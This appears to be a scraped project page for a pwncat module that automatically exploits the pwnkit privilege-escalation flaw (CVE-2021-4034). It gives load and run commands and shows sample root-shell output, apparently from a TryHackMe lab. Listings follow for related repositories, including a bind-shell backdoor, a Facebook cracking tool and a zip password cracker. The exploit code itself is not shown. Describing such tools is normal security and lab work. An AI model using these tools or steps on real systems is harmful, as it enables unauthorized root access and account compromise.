pwncat module that automatically exploits CVE-2021-4034 (pwnkit)

Related tags

Security related resourcespwncat_pwnkit
Overview

pwncat_pwnkit

asciicast

Introduction

The purpose of this module is to attempt to exploit CVE-2021-4034 (pwnkit) on a target when using pwncat.

There is no need to setup any directories, compile any source or even have gcc on the remote target; the pwnkit module takes care of this automatically using the pwncat framework.

Setup and Use

  • Simply copy pwnkit.py somewhere on your host where pwncat-cs is installed. ie: /home/user/pwncat_mods
  • In pwncat, simply type: load /home/user/pwncat_mods
  • To confirm the module loaded, type: search pwnkit. You should see something like this:
(local) pwncat$ search pwnkit
                                                      Results                                                      
                   ╷                                                                                               
  Name             │ Description                                                                                   
 ══════════════════╪══════════════════════════════════════════════════════════════════════════════════════════════ 
  pwnkit           │ Exploit CVE-2021-4034 to privesc to root
  • To execute, simply type run pwnkit. If it's successful, you should see the UID change to 0, and now be root. ie:
(local) pwncat$ run pwnkit
[00:12:15] 10.10.184.131:47148: ran pwnkit. UID : Before(1000) | After(0)                            manager.py:955
           Module pwnkit completed successfully                                                          run.py:100
(local) pwncat$                                                                                                    
(remote) [email protected]:/# id
uid=0(root) gid=0(root) groups=0(root),1000(tryhackme)

Tips

  • If you don't want to always call load, you can have pwncat automatically load this module on startup by placing it in ~/.local/share/pwncat/modules
  • To use the cross-compiler to build the exploit on your machine and upload it to the target, you need to set the cross variable in your pwncatrc file. This file is typically found at ~/.local/share/pwncat/pwncatrc`. ie:
# Set the gcc path
set cross "/usr/bin/gcc"

Thanks

A special shout out to Caleb Stewart for being helpful as I pushed through learning the pwncat framework from a dev perspective. I will get a pull request to put this in the main pwncat escalate module someday when I have free time... I promise. :-)

Owner
Dana Epp
Security (de)engineering for fun and profit.
Dana Epp
GitHub Repository
A python tool capable of creating HUGE wordlists. Has the ability to add custom words for concatenation in any way you see fit.

A python tool capable of creating HUGE wordlists. Has the ability to add custom words for concatenation in any way you see fit.

Codex 9 Oct 05, 2022
Internationalized Domain Names for Python (IDNA 2008 and UTS #46)

Internationalized Domain Names in Applications (IDNA) Support for the Internationalised Domain Names in Applications (IDNA) protocol as specified in R

Kim Davies 204 Dec 13, 2022
Lite version of my Gatekeeper backdoor for public use.

MayorSec Backdoor Fully functioning bind-type backdoor This backdoor is a fully functioning bind shell and lite version of my full functioning Gatekee

Joe Helle 56 Mar 25, 2022
A simple python script for hosting a Snowflake Proxy in your python program or with it's standalone cli

snowflake-cli Snowflake is a system to defeat internet censorship, made by Tor Project. The system works by volunteers who run the snowflake extension

Guilherme Paixão 6 Jul 14, 2022
This repo explains in details about buffer overflow exploit development for windows executable.

Buffer Overflow Exploit Development For Beginner Introduction I am beginner in security community and as my fellow beginner, I spend some of my time a

cris_0xC0 11 Dec 17, 2022
A compact version of EDI-Vetter, which uses the TLS output to quickly vet transit signals.

A compact version of EDI-Vetter, which uses the TLS output to quickly vet transit signals. All your favorite hits in a simplified format.

Jon Zink 2 Aug 03, 2022
✨ Powerfull & Universal Link Bypasser ✨

✨ Powerfull & Universal Link Bypasser ✨

Vodkarm06 4 Jun 03, 2022
Flutter Reverse Engineering Framework

This framework helps reverse engineer Flutter apps using patched version of Flutter library which is already compiled and ready for app repacking. There are changes made to snapshot deserialization p

PT SWARM 910 Jan 01, 2023
This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version contains a wordlist of all the files directories for this version.

webapp-wordlists This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version co

Podalirius 396 Jan 08, 2023
Having a weak password is not good for a system that demands high confidentiality and security of user credentials

Having a weak password is not good for a system that demands high confidentiality and security of user credentials. It turns out that people find it difficult to make up a strong password that is str

PyLaboratory 0 Feb 07, 2022
Seamless deployment and management of cybersecurity solutions 🏗️

Description 🖼️ Background 👴🏼 Vision 📜 Concepts 💬 Solutions' Lifecycle. Operations ⭕ Functionalities 🚀 Supported Cybersecurity Solutions 📦 Insta

MutableSecurity 36 Nov 10, 2022
Monty Hall Problem simulation written in Python.

Monty Hall Problem Simulation monty_hall_sim is a brute-force method of determining the optimal strategy for the Monty Hall Problem. Usage Set boolean

Xavier D 1 Aug 29, 2022
Recon is a script to perform a full recon on a target with the main tools to search for vulnerabilities.

👑 Recon 👑 The step of recognizing a target in both Bug Bounties and Pentest can be very time-consuming. Thinking about it, I decided to create my ow

Dirso 171 Dec 31, 2022
TOOLS CRACK FACEBOOK

Installation $ pkg update && pkg upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/Mark-Zuck/zafi $ cd zafi $ pip2 instal

Romi Afrizal 50 Dec 26, 2022
🔐 A simple command-line password manager.

PassVault What Is It? It is a command-line password manager, for educational purposes, that stores localy, in AES encryption, your sensitives datas in

5 Aug 15, 2022
Lite - Lite cracker tool for python

Wellcome to tools Results Install Tools

Jeeck X Nano 23 Dec 17, 2022
Safe Policy Optimization with Local Features

Safe Policy Optimization with Local Feature (SPO-LF) This is the source-code for implementing the algorithms in the paper "Safe Policy Optimization wi

Akifumi Wachi 6 Jun 05, 2022
A Simple File Encryptor/Decryptor

Ec: A Simple File Encryptor/Decryptor This has been made for educational reasons only, any constructive criticism/advice/comments are welcome! Also, p

1 Dec 10, 2021
Website OSINT untuk mencari informasi dari email dan nomor telepon. Dibuat dengan React dan Flask.

Inspektur Cari informasi mengenai email dan nomor telepon dengan mudah. Inspektur adalah aplikasi OSINT yang berguna untuk mencari informasi berdasark

Bagas Wastu 36 Dec 04, 2022
You can crack any zip file and get the password.

Zip-Cracker Video Lesson : This is a Very powerfull Zip File Crack tool for termux users. Check 500 000 Passwords in 30 seconds Unique Performance Che

Razor Kenway 13 Oct 24, 2022